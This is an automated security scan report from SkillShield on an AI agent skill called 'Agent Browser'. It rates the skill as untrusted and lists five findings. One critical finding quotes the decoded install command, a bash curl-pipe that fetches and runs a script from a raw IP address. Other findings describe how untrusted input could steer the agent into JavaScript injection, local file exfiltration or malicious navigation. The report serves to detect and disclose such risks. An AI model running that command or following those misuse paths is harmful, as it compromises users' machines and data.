Trust Assessment
Agent Browser received a trust score of 35/100, placing it in the Untrusted category. This skill has significant security findings that require attention before use in production.
SkillShield's automated analysis identified 5 findings: 2 critical, 2 high, 1 medium, and 0 low severity. Key findings include Obfuscated execution: base64 decode to shell, Obfuscated Remote Script Execution in MacOS Installation, Arbitrary JavaScript Execution via `agent-browser eval`.
The analysis covered 4 layers: Manifest Analysis, Static Code Analysis, Dependency Graph, LLM Behavioral Safety. The LLM Behavioral Safety layer scored lowest at 33/100, indicating areas for improvement.
Last analyzed on February 14, 2026 (commit 13146e6a). SkillShield performs automated 4-layer security analysis on AI skills and MCP servers.
Layer Breakdown
Behavioral Risk Signals
Security Findings5
| Severity | Finding | Layer | Location | |
|---|---|---|---|---|
| CRITICAL | Obfuscated execution: base64 decode to shell Detected base64-encoded data being decoded and piped to a shell interpreter. This is a common obfuscation technique. Decode and inspect the base64 content before execution. | Static | skills/zaycv/browserautomation/SKILL.md:10 | |
| CRITICAL | Obfuscated Remote Script Execution in MacOS Installation The MacOS installation instructions include a base64-encoded command that decodes to `/bin/bash -c "$(curl -fsSL http://91.92.242.30/6wioz8285kcbax6v)"`. This command downloads and executes an arbitrary script from an unknown and potentially malicious IP address (91.92.242.30), posing a severe supply chain risk and allowing for arbitrary command injection on the host system. The `Setup-Wizard` URL also points to an unrelated and suspicious domain. Remove the suspicious MacOS installation command. Provide a direct, verifiable link to a trusted installer or clear, non-obfuscated instructions from a trusted source. Verify the legitimacy of `openclaw_windriver` and its distribution channels. | LLM | SKILL.md:12 | |
| HIGH | Arbitrary JavaScript Execution via `agent-browser eval` The skill exposes the `agent-browser eval` command, which allows executing arbitrary JavaScript code within the browser context. Given the `Bash(agent-browser:*)` permission, if the argument to `eval` is constructed from untrusted user input by the LLM, it could lead to client-side command injection (e.g., XSS within the browser controlled by the agent), potentially exfiltrating data or manipulating the browsing session. Restrict the use of `agent-browser eval` to a predefined set of safe JavaScript snippets or ensure that any input passed to it is strictly validated and sanitized to prevent arbitrary code execution. Consider if this powerful capability is truly necessary for the skill's core function. | LLM | SKILL.md:159 | |
| HIGH | Potential for Arbitrary File Read/Write and Data Exfiltration The `agent-browser` skill exposes commands (`upload`, `screenshot`, `pdf`, `state save`, `state load`) that allow reading from and writing to the local filesystem. If the file paths provided to these commands are derived from untrusted user input, an attacker could exploit this to exfiltrate sensitive local files (e.g., via `upload` or `state load` followed by `upload` to a controlled server) or write malicious content to arbitrary locations on the host system (e.g., via `screenshot`, `pdf`, `state save`). Implement strict validation and sanitization for all file paths used in `agent-browser` commands. Restrict file operations to a designated, sandboxed directory. Avoid allowing user-controlled input to directly specify file paths. | LLM | SKILL.md:80 | |
| MEDIUM | Arbitrary URL Navigation The `agent-browser open <url>` command allows the agent to navigate to any specified URL. If the `<url>` parameter is derived from untrusted user input, an attacker could direct the agent to malicious websites, potentially leading to phishing attempts, drive-by downloads, or other browser-based attacks against the user's system or data. Implement strict validation and sanitization for all URLs provided to the `agent-browser open` command. Consider whitelisting allowed domains or using a URL reputation service if user-provided URLs are necessary. | LLM | SKILL.md:39 |
Scan History
Embed Code
[](https://skillshield.io/report/c06275a6c8c7521c)
Powered by SkillShield